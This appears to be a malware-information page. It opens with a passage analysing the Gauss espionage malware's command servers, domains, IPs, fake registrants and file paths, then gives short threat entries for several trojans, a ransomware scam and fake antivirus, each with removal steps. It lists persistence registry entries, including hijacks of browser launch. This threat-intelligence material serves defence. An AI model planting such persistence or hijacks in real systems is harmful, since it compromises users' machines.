    File Version:    2001.12.4414.320 Product Version: 5.1.2600.5788 File OS:         WINDOWS32 File Type:       DLL File SubType:    UNKNOWN File Date:       00:00:00  00/00/0000 Language/Code Page: 1033/1200 CompanyName:        Microsoft Corporation FileDescription:    WIN32 Digital Library FileVersion:        2001.12.4414.320 LegalCopyright:     Copyright (C) Microsoft Corp. 1995-1999 LegalTrademarks:    Microsoft(R) is a registered trademark of Microsoft 
    Corporation. Windows(TM) is a trademark of Microsoft Corporation ProductName: MicrosoftR WindowsR Operating System ProductVersion: 05.01.2600.5788

    Version info 'windig.ocx'

    Gauss C&C Information

    To upload data stolen from infected machines, Gauss uses a number of command-and-control servers predefined in its flexible configuration.

     
    Figure 1 - Gauss encrypted C&C information data

    Here's a look at the decrypted configuration data:

     
    Figure 2 - Gauss decrypted C&C configuration data

    In the example above, we can see the C&C domains/hosts together with the name of the script (userhome.php) on the server which is used for communication.

    Going through the multitude of Gauss samples, we identified several domains used as C&C servers:

    • *.gowin7.com
    • *.secuurity.net
    • *.datajunction.org
    • *.bestcomputeradvisor.com
    • *.dotnetadvisor.info
    • *.guest-access.net
    Wmiqry.ocx        
    01.06.2011 dotnetadvisor.info bestcomputeradvisor.info datajunction.org guest-access.net
    16.07.2011 *.bestcomputeradvisro.info *.guest-access.net    
    18.07.2011 *.bestcomputeradvisor.info *.guest-access.net    
    28.09.2011 *.gowin7.com *.secuurity.net    
    20.10.2011 *.datajunction.org *.dotnetadvisor.info    
    20.10.2011 *.gowin7.com *.secuurity.net    

    Depending on the variant, * can be 'a' or 'b' or 'c' - and so on.For instance, a fully qualified hostname as in the example above is 'b.gowin7.com'.

    Most samples we have use '*.gowin7.com' and '*.secuurity.net'. The domains 'gowin7.com' and 'secuurity.net ' have been registered by an 'Adolph Dybevek, which is most likely a fake identity:

    owner-name: Adolph Dybevek
    owner-address: Prinsen gate 6
    owner-city: Oslo
    admin-address: Prinsen gate 6
    ICANN Registrar: UNITED-DOMAINS AG
    Created: 2012-03-15
    Expires: 2013-03-15
    Updated: 2012-03-15

    As in the case of Flame these domain registration addresses point to existing businesses. For example, at Prinsens Gate 6 in Olso, we find a hotel in Norway:


    Similarly, many of Flame C&D domain fake registrations used addresses of hotels.

    During the period of monitoring, we observed these two main domains pointing to two different servers in India and Portugal. Based on passive DNS research, we identified three other servers, located in the US which appear to have been used as C&C.

    The hosts 'gowin7.com' and 'secuurity.net' pointed to the following IP addresses:

    Date Domain IP
    28.06.2012 23:05 b.gowin7.com 109.71.45.115
    2012-06-29 07:05:28 (changed) b.gowin7.com 182.18.166.116
    28.06.2012 23:05 b.secuurity.net 109.71.45.115
    2012-06-29 07:05:29 (changed) b.secuurity.net 182.18.166.116

    On 29th of June, 2012, the two C&C domains 'gowin7.com' and 'secuurity.net' were changed from IP 109.71.45.115 to a new IP 182.18.166.116.

    Both servers were shut down around July 13th, 2012. Prior to shut down, we managed to collect important information. Both appeared to be running Debian Linux, which is consistent with the Flame C&C servers. They were listening on ports 22, 80 and 443. The SSL certificates were self-signed, once again, the same as in the case of Flame. Here's the certificate for the server in Portugal:


    If we are to believe the information in the certificate, it was generated on 17 Feb 2012.

    The server at 182.18.166.116 (India) appears to currently host two other related domains:

    • bestcomputeradvisor.com
    • dotnetadvisor.info

    Both have been registered by somebody named Gilles Renaud, probably another fake identity:

     

    Registrant:

     

    Gilles Renaud
    Neugasse 10
    Zurich, Zurich 8005
    CH

    They were previously hosted in the US, at the IPs: 173.204.235.204 and 173.204.235.196.

    We currently have seen samples which used {e,g,h}.bestcomputeradvisor.com and 'c.dotnetadvisor.info' for command-and-control. It's quite possible that other samples exist pointing to different hosts.

    The additional domains 'datajunction.org' and 'guest-access.net' can be found in some samples and it is also used for C&C communications. We currently have samples which use 'c.datajunction.org' and 'd.datajunction.org' but there are probably others using 'a.*' and 'b.*'.

    Both have been registered by somebody named 'Peter Kulmann,' probably another fake identity:

    Registrant Name:Peter Kulmann
    Registrant Street1:Antala Staska 1301/19
    Registrant Street2:
    Registrant Street3:
    Registrant City:Prague
    Registrant State/Province:
    Registrant Postal Code:14000
    Registrant Country:CZ

    The address 'Antala Staska 1301/19' appears once again to be fake - pointing to a supermarket/pharmacy in Prague:

     

    Currently (as of August 2012), all the '*.datajunction.org' hosts point to the C&C server in India. Previously, they pointed to the server in Portugal. Just like the others, they were previously hosted in US.

    In addition to these, we identified another domain named 'dataspotlight.net' which was hosted on the same servers. The registrant is unknown and we couldn't find any samples using it, however, it is probably related to the others.

    Gauss C2 Domains Overview:

    In total, we have identified 7 domains used or related to the Gauss malware:

    Domain Registered by Currently hosted Previously hosted Older hosted:
    gowin7.com Adolph Dybevek India Portugal US
    secuurity.net Adolph Dybevek India Portugal US
    datajunction.org PeteršKulmann India Portugal US
    bestcomputeradvisor.com GillesšRenaud India Portugal US
    dotnetadvisor.info GillesšRenaud India Portugal US
    dataspotlight.net UNKNOWN India Portugal UNKNOWN
    guest-access.net Peter Kulmann No No No

    Domain registration history:

    Domain Registration date
    bestcomputeradvisor.com, dotnetadvisor.info 22 July 2011
    datajunction.org. guest-access.net 26 July 2011
    gowin7.com, secuurity.net 15 March 2012
    dataspotlight.net 18 April 2012

    As can be seen from the table above, four domains were created in 2011 and were used in older samples. The newer samples use 'gowin7.com' and 'secuurity.net', which were registered on March 15th, 2012.

    Known Gauss C2 server IPs:

    Server Location
    182.18.166.116 India, Hyderabad
    109.71.45.115 Portugal, Constancia
    173.204.235.204 United States, San Francisco
    173.204.235.196 United States, San Francisco
    173.204.235.201 United States, San Francisco

     

    Here's a comparison of the Flame and Gauss C2 infrastructure:

      Flame Gauss
    Hosting VPS running Debian Linux VPS running Debian Linux
    Services available SSH, HTTP, HTTPS SSH, HTTP, HTTPS
    SSL certificate 'localhost.localdomain' - self signed 'localhost.localdomain' - self signed
    Registrant info Fake names Fake names
    Address of registrants Hotels, shops Hotels, shops
    C2 traffic protocol HTTPS HTTPS
    C2 traffic encryption None XOR 0xACDC
    C2 script names cgi-bin/counter.cgi, common/index.php userhome.php
    Number of C2 domains ~100 6
    Number of fake identities used to register domains ~20 3

    DNS Balancing

    For some of the C2's, the controllers used a technique known as DNS balancing or 'Round robin DNS' - probably to even the load. This is a common technique in the case of massive traffic to a website, suggesting that at their peak, the Gauss C2's were handling quite a lot of data.

    Here's one such example of DNS balancing:

    ;; QUESTION SECTION: ;DATAJUNCTION.ORG.              IN      A  ;; ANSWER SECTION: DATAJUNCTION.ORG.         900     IN      A       182.18.166.116 DATAJUNCTION.ORG.       3600    IN       A       173.204.235.204 DATAJUNCTION.ORG.         900     IN      A       109.71.45.115

    As it can be seen, the domain datajunction.org resolves to three different IPs: 182.18.166.116, 173.204.235.204 and 109.71.45.115.

    Timeline

    We tried to put together all the date-of-creation information for the different Gauss modules, as well as those for Flame and Duqu. Since no Gauss modules created before 2011 have been found, the table below does not include earlier data for Flame and Duqu modules.


    Files list

    We have put together the names of all modules, temporary files, log files and data files used by Gauss in one way or another and that are known to us.

    Main modules Path
    wmiqry32.dll %system%\wbem
    wmihlp32.dll %system%\wbem
    dskapi.ocx %system%
    winshell.ocx %system%
    devwiz.ocx %system%
    lanhlp32.ocx %system%
    mcdmn.ocx %system%
    smdk.ocx %system%
    windig.ocx %system%
    system32.bin root folder USB drive
    system32.dat root folder USB drive
    .CatRoot.tmp root folder USB drive
    Data files and folders Path
    ~shw.tmp %temp%
    ~stm.tmp %temp%
    ws1bin.dat %windir%\Temp
    ws1bin.dat %temp%
    ~gdl.tmp %temp%
    ~mdk.tmp %temp%
    .thumbs.db root folder USB drive
    wabdat.dat %temp%
    desktop.ini inside folders on USB drive
    target.lnk inside folders on USB drive
    .Backup0[D-M] directory on USB drive
    .Backup00[D-M] directory on USB drive
    md.bak %temp%
    s61cs3.dat %systemroot%\Temp\
    s61cs3.dat %temp%
    ~ZM6AD3.tmp %windir%\temp
    browser.js "%AppData%\Roaming\Mozilla\Firefox\Profiles\*\
    {a288cad4-7b24-43f8-9f4d-8e156305a8bc}
    %AppData%\Mozilla\Firefox\Profiles\*\
    {a288cad4-7b24-43f8-9f4d-8e156305a8bc} "
    browser.xul "%AppData%\Roaming\Mozilla\Firefox\Profiles\*\
    {a288cad4-7b24-43f8-9f4d-8e156305a8bc}
    %AppData%\Mozilla\Firefox\Profiles\*\
    {a288cad4-7b24-43f8-9f4d-8e156305a8bc} "
    fileio.js "%AppData%\Roaming\Mozilla\Firefox\Profiles\*\
    {a288cad4-7b24-43f8-9f4d-8e156305a8bc}
    %AppData%\Mozilla\Firefox\Profiles\*\
    {a288cad4-7b24-43f8-9f4d-8e156305a8bc} "
    chrome.manifest "%AppData%\Roaming\Mozilla\Firefox\Profiles\*\
    {a288cad4-7b24-43f8-9f4d-8e156305a8bc}
    %AppData%\Mozilla\Firefox\Profiles\*\
    {a288cad4-7b24-43f8-9f4d-8e156305a8bc} "
    lppd.dat "%AppData%\Roaming\Mozilla\Firefox\Profiles\*\
    {a288cad4-7b24-43f8-9f4d-8e156305a8bc}
    %AppData%\Mozilla\Firefox\Profiles\*\
    {a288cad4-7b24-43f8-9f4d-8e156305a8bc} "
    install.rdf "%AppData%\Roaming\Mozilla\Firefox\Profiles\*\
    {a288cad4-7b24-43f8-9f4d-8e156305a8bc}
    %AppData%\Mozilla\Firefox\Profiles\*\
    {a288cad4-7b24-43f8-9f4d-8e156305a8bc} "
    rssf.dat "%AppData%\Roaming\Mozilla\Firefox\Profiles\*\
    {a288cad4-7b24-43f8-9f4d-8e156305a8bc}
    %AppData%\Mozilla\Firefox\Profiles\*\
    {a288cad4-7b24-43f8-9f4d-8e156305a8bc} "
    lfm.dat "%AppData%\Roaming\Mozilla\Firefox\Profiles\*\
    {a288cad4-7b24-43f8-9f4d-8e156305a8bc}
    %AppData%\Mozilla\Firefox\Profiles\*\
    {a288cad4-7b24-43f8-9f4d-8e156305a8bc} "
    mppd.dat "%AppData%\Roaming\Mozilla\Firefox\Profiles\*\
    {a288cad4-7b24-43f8-9f4d-8e156305a8bc}
    %AppData%\Mozilla\Firefox\Profiles\*\
    {a288cad4-7b24-43f8-9f4d-8e156305a8bc} "
    pddp.dat "%AppData%\Roaming\Mozilla\Firefox\Profiles\*\
    {a288cad4-7b24-43f8-9f4d-8e156305a8bc}
    %AppData%\Mozilla\Firefox\Profiles\*\
    {a288cad4-7b24-43f8-9f4d-8e156305a8bc} "
    pldnrfn.ttf %SystemRoot%\fonts\

    Conclusion

    Gauss is the most recent development from the pool of cyber-espionage projects that includes Stuxnet, Flame and Duqu. It was most likely created in mid-2011 and deployed for the first time in August-September 2011.

    Its geographical distribution is unique; the majority of infections were found in Lebanon, Palestine and Israel. One of the modules from Jan 2012 contains the path 'c:\documents and settings\flamer\desktop\gauss_white_1'. The 'flamer' in the path above is the Windows username that compiled the project. Given the focus on Lebanon, the 'white' version identifier can probably be explained as following: 'the name Lebanon comes from the Semitic root LBN, meaning "white", likely a reference to the snow-capped Mount Lebanon.' (Wikipedia)

    Code references and encryption subroutines, together with the Command and Control infrastructure make us believe Gauss was created by the same 'factory' which produced Flame. This indicates it is most likely a nation-state sponsored operation.

    Between Gauss' functions, the 'Winshell.ocx' module which gives the name to the malware as 'Gauss', steals credentials required to access online banking accounts for several Lebanese banks - including the Bank of Beirut, Byblos Bank and Fransabank. This is the first publicly known nation-state sponsored banking Trojan.

    Another feature which makes Gauss unique is its encrypted payload, which we haven't been able to unlock. The payload is run by infected USB sticks and is designed to surgically target a certain system (or systems) which have a specific program installed. One can only speculate on the purpose of this mysterious payload.

    The discovery of Gauss indicates that there are probably many other related cyber-espionage malware in operation. The current tensions in the Middle East are just signs of the intensity of these ongoing cyber-war and cyber-espionage campaigns.

       You can download PDF version of this article here.

     Malware information source: Securelist

     

  • Technical Details:

    Trojan.Begseabug is a computer Trojan infection that will attempt to connect to a remote server and download additional malicious files. Trojan.Begseabug will modify Windows registry to be able to run itself when Windows is started and bypass any firewall applications.

  • Installation:

    Malicious Files Added by Trojan.Begseabug:

    • %System%\[RANDOM CHARACTERS].exe
    • %System%\system.exe
    • %Temp%\1.tmp
    • %Temp%\IXP000.TMP\Setup4.exe
    • %Temp%\IXP000.TMP\Setup8.exe
    • %Temp%\IXP001.TMP\Setup4.exe
    • %Temp%\IXP001.TMP\Setup8.exe
    • %Temp%\IXP001.TMP\QVODSE~1.EXE

    Associated Windows Registry Entries:

    • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\”wextract_cleanup0″ = “rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 \”%Temp%\IXP000.TMP\\”"
    • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\”wextract_cleanup1″ = “rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 \”%Temp%\IXP001.TMP\\”"
    • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\”system” = “%System%\system.exe”
  • Remove:
    • Temporarily Disable System Restore (Windows Me/XP).
    • Update the virus definitions.
    • Reboot computer in SafeMode
    • Run a full system scan and clean/delete all infected file(s)
    • Delete/Modify any values added to the registry.
    • Exit registry editor and restart the computer.
  • Technical Details:

    W32.Virauto is a computer worm that propagates by creating a copy of itself on removable devices and shared network drives. W32.Virauto can open a backdoor port on the compromised computer that will provide unauthorized access to a remote attacker.

  • Installation:

    Malicious Files Added by W32.Virauto:

    • %SystemDrive%\Program Files\Windows NT\explorer.exe
    • %UserProfile%\Local Settings\Temp\[DATE](0).zip
    • %SystemDrive%\Program Files\Windows NT\antivir.dll
    • %SystemDrive%\Program Files\Windows NT\cmd32.exe

    Associated Windows Registry Entries:

    • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\”{01E04581-4EEE-11D0-BFE9-00AA005B4383}” = “[HEXADECIMAL VALUE]”
    • HKEY_CLASSES_ROOT\exefile\shell\syntax0\command\”@” = “C:\Program Files\Windows NT\explorer.exe \”%1\” %*”
    • HKEY_CLASSES_ROOT\exefile\shell\”@” = “syntax0″
  • Remove:
    • Temporarily Disable System Restore (Windows Me/XP).
    • Update the virus definitions.
    • Reboot computer in SafeMode
    • Run a full system scan and clean/delete all infected file(s)
    • Delete/Modify any values added to the registry.
    • Exit registry editor and restart the computer.
  • Technical Details:

    W32.Buzus!gen is a generic detection used to identify threats that were found related to W32.Buzus family of Trojan. Files detected as W32.Buzus!gen are believed to be malicious and may bring more damage to infected computer if not removed immediately.

  • Remove:
    • If using Windows Me/XP, System Restore must be disabled to prevent the threat from restoring itself.
    • Database, pattern and definition files of installed antivirus programs must be updated.
    • Reboot computer in SafeMode
    • Run a full system scan and clean/delete all infected file(s)
    • Restart the computer.
  • Technical Details:

    W32.Qakbot!html is a usual detection for infected .htm, .cfm, .pl and .php files. These mentioned files were contracted by W32.Qakbot!html to perform malicious actions on the compromised computer.

  • Remove:
    • If using Windows Me/XP, System Restore must be disabled to prevent the threat from restoring itself.
    • Database, pattern and definition files of installed antivirus programs must be updated.
    • Reboot computer in SafeMode
    • Run a full system scan and clean/delete all infected file(s)
    • Restart the computer.
  • Technical Details:

    Adware.Clkpotato!gen2 is a generic detection that will identify malicious programs that were found associated to Adware.Clickpotato group. Files that were identified as Adware.Clkpotato!gen2 are deemed harmful and may cause several security risks on the compromised computer.

  • Remove:
    • If using Windows Me/XP, System Restore must be disabled to prevent the threat from restoring itself.
    • Database, pattern and definition files of installed antivirus programs must be updated.
    • Reboot computer in SafeMode
    • Run a full system scan and clean/delete all infected file(s)
    • Restart the computer.
  • Technical Details:

    W32.Qakbot!job is a detection for malicious job file created by W32.Qakbot family of computer worms through Windows Task Scheduler. W32.Qakbot!job was made in order to run a randomly named JavaScript file.

  • Remove:
    • If using Windows Me/XP, System Restore must be disabled to prevent the threat from restoring itself.
    • Database, pattern and definition files of installed antivirus programs must be updated.
    • Reboot computer in SafeMode
    • Run a full system scan and clean/delete all infected file(s)
    • Restart the computer.
  • Technical Details:

    Windows License Locked! is a ransomware or desktop locking virus that is being distributed by pretending an update file for FireFox browser. It can be downloaded as file Firefox_update.exe. Windows License Locked! virus will use fake security web site usually published in French. This program will prevent any execution of installed application and advise users of possible software errors. It will repeatedly prompt to activate a copy of Windows by paying for the licensed which is actually a scam. Alert will contain the following message:

    Windows License Locked!
    This copy of Windows is locked. You maybe a victim of a fraud or there may be an internal system error.
    To continue using Windows you should complete activation.
    Activation is absolutely free and is simply a formality. You do not need to pay for the license and you will not be required to provide any personal data.

    Windows License Locked! virus is not in any way part of the Windows operating system. It will be present on computers already infected with a Trojan. Main purpose of Windows License Locked! virus is to deceive users about the unlicensed version of Windows and force to activate by redirecting its browser to an online payment processing website where credit card information is required.

    windows license locked

  • Installation:

    Malicious Files Added by Windows License Locked!:

    Internet-Explorer_update.exe
    4F.tmp
    Chrome_update.exe
    Keygen-AUTODESK_AUTOCAD_MAP_3D_2011_x32_x64.exeInstall_Flash-Player.exe
    Dc17.exe
    WindowsWebSecurity.exe

    Windows License Locked! Registry Entries:

    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “[random].exe”
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “WindowsWebSecurity.exe”

  • Remove:
    1. Press Ctrl+Alt+Del on keyboard to stop process associated to “Windows License Locked!”. When Windows Task Manager opens, go to Processes Tab and find and end the following process: (random characters).exe, WindowsWebSecurity.exe

    2. You need to update your installed antivirus application to have the latest database.
       
    3. Thoroughly scan the computer and any detected threats must be removed. If removal is prohibited, it is best to quarantine the infected item. Manually locating and deleting of malicious files should also be performed. Please see files below that are related to Windows License Locked! Virus.
       
    4. Registry entries created by Windows License Locked! must also be remove from the Windows system. Please refer below for entries associated to the rogue program.
       
    5. Exit registry editor.
       
    6. Get rid of Windows License Locked! start-up entry by going to Start > Run, type msconfig on the “Open” dialog box. A windows containing System Configuration Utility will be launched. Go to Startup tab and uncheck the following Start-up item(s): (random characters).exe, WindowsWebSecurity.exe

    7. Click Apply and restart the computer.
  • Technical Details:

    Fake BitDefender 2011 is a misleading security software that will mimic the legitimate program in order to deceive computer users. Sometimes called as the Fake Bit Defender 2011 virus, this one was included in the lists of rogue security applications that were created specifically to be sold via unfair marketing method. The real BitDefender 2011 can be downloaded from bitdefender.com web site and must be installed manually, while the rogue one’s will be dropped on to computers and be installed without users consent. Also the legitimate one is offered in two variants namely BitDefender Antivirus Pro, BitDefender Total Security 2011 and BitDefender Internet Security 2011. These variants offers different levels of protection.

    It is good to know that fake BitDefender 2011 can penetrate a computer without being detected. This is because it uses a technique that will hide itself on the system by injecting a code on legitimate Windows process. A Trojan is also responsible why the fake BitDefender 2011 can manipulate a system without hindrance from any security applications installed. Modifications can be performed on the registry that will allow itself to run when Windows is started. Removing BitDefender 2011 virus is the best idea to prevent further harm it may cause to compromised computer. Use only legitimate anti-malware programs to scan the computer and remove fake BitDefender 2011 together with all the files residing on the system.

    fake bitdefender

  • Installation:

    Malicious Files Added by Fake BitDefender 2011:

    c:\Program Files\BitDefender 2011\
    c:\Program Files\BitDefender 2011\bitdefender.exe
    c:\Documents and Settings\All Users\Start Menu\BitDefender 2011\
    c:\Documents and Settings\All Users\Start Menu\BitDefender 2011\BitDefender 2011.lnk
    %AllUsersProfile%\Start Menu\BitDefender 2011\Uninstall.lnk
    %UserProfile%\Desktop\BitDefender 2011.lnk
    %Temp%\srvED4.ini
    %Temp%\srvED4.tmp

    Fake BitDefender 2011 Registry Entries:


    HKEY_CURRENT_USER\Software\MonEC2
    HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings “ProxyEnable” = ‘0′
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “BitDefender 2011″ = ‘C:\Program Files\BitDefender 2011\bitdefender.exe’
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe “Debugger” = ‘msiexecs.exe -sb’
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe “Debugger” = ‘msiexecs.exe -sb’
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe “Debugger” = ‘msiexecs.exe -sb’
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\opera.exe “Debugger” = ‘msiexecs.exe -sb’
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\safari.exe “Debugger” = ‘msiexecs.exe -sb’
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform “WinNT-EVI 21.04.2011″

  • Remove:
    1.  Press Ctrl+Alt+Del on keyboard to stop process associated to “BitDefender 2011″. When Windows Task Manager opens, go to Processes Tab and find and end the following process: (random characters).exe

    2. You need to update your installed antivirus application to have the latest database.
       
    3. Thoroughly scan the computer and any detected threats must be removed. If removal is prohibited, it is best to quarantine the infected item. Manually locating and deleting of malicious files should also be performed. Please see files below that are related to BitDefender 2011 Virus.
       
    4. Registry entries created by BitDefender 2011 must also be remove from the Windows system. Please refer below for entries associated to the rogue program.
       
    5. Exit registry editor.
       
    6. Get rid of BitDefender 2011 start-up entry by going to Start > Run, type msconfig on the “Open” dialog box. A windows containing System Configuration Utility will be launched. Go to Startup tab and uncheck the following Start-up item(s): (random characters).exeWindowsWebSecurity.exe.
       
    7. Click Apply and restart the computer.